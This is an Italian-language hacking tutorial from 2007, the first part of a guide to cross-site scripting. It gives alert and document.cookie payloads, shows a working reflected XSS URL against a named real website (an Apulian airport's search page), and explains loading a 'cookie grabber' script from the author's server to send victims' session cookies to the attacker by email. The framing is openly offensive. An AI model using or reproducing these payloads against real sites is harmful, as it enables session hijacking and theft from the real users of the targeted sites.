-------------------------------
Autore: Langy
Data: 6-09-2007
Copyright: http://www.googlebig.com
-------------------------------
Link utili:
http://www.gnucitizen.org/xssdb/application.htm (Attack Database)
http://www.xssed.com (Mirror Archive of Vulnerable Websites)
http://ha.ckers.org/xss.html (XSS Cheat sheet)
http://software.graflex.org/dexss/ (Removing JavaScript from HTML)
http://en.wikipedia.org/wiki/Cross-site_scripting
-------------------------------
Trovare un sito vulnerabile a xss non e' molto difficile.
Nella maggiorparte dei casi si trova scrivendo nel campo di ricerca:
"><script>alert('prova');</script>
questo script non fa altro che inviare un alert a video, se l'alert viene visualizzato vuol dire che lo script viene preso in pasto dal sito.
a questo punto proviamo a scrivere
"><script>alert('document.cookie');</script> oppure
"><script>alert(document.cookie);</script>
se questa xss funziona sul sito vittima vedremo comparire a video l'alert con all'interno il nostro cookie della sessione del sito.
In alternativa se dovesse non funzionare basta controllare l'url e vedere come viene generata:
- ESEMPIO PRATICO:
L'ultima xss che ho scoperta e' sul sito dell'aeroporto di Puglia:
http://www.seap-puglia.it/
se proviamo a cercare "><script>alert('prova');</script> non succede niente.
Ora pero' analizziamo l'url:
http://www.seap-puglia.it/default.asp?rif=1&tiporicerca=2&strRicerca1=
%22%3E%3Cscript%3Ealert('prova');%3C/script%3E&strRicerca2=
&strRicerca3=&sel1=AND&sel2=AND&RicInt1=1&RicInt2=0&RicInt3=0
troviamo la variabile che rende possibile la ricerca, in questo caso e': strRicerca1
quindi applichiamo l'alert direttamente dopo questa variabile:
http://www.seap-puglia.it/default.asp?rif=1&tiporicerca=2&
strRicerca1="><script>alert('prova');</script>
vedremo per magia comparire l'alert.
ora proviamo a scrivere:
http://www.seap-puglia.it/default.asp?rif=1&tiporicerca=2&str
Ricerca1="><script>alert(document.cookie);</script>
Perfetto! Vediamo il nostro cookie!
A questo punto ci serve sapere i cookie della vittima e quindi entra in gioco un cookie grabber che altro non e' che uno script che risiedera' sul nostro
server e che includeremo nell'url del sito vulnerabile per farci inviare i cookie direttamente dalla vittima :D
Per includere un file con javascript possiamo scrivere così
"><script src="http://www.googlebig.com/cookiescript.js"></script>
All'interno del file cookiescript.js ci scriveremo in codice che visualizza il cookie e ce lo invia per email.
Questo verra' illustrato nella seconda parte della guida.
La seguente guida puo' essere utilizzata liberamente su qualsiasi sito includendo senza modifiche il copyright.
Vai alla 2a Parte della Guida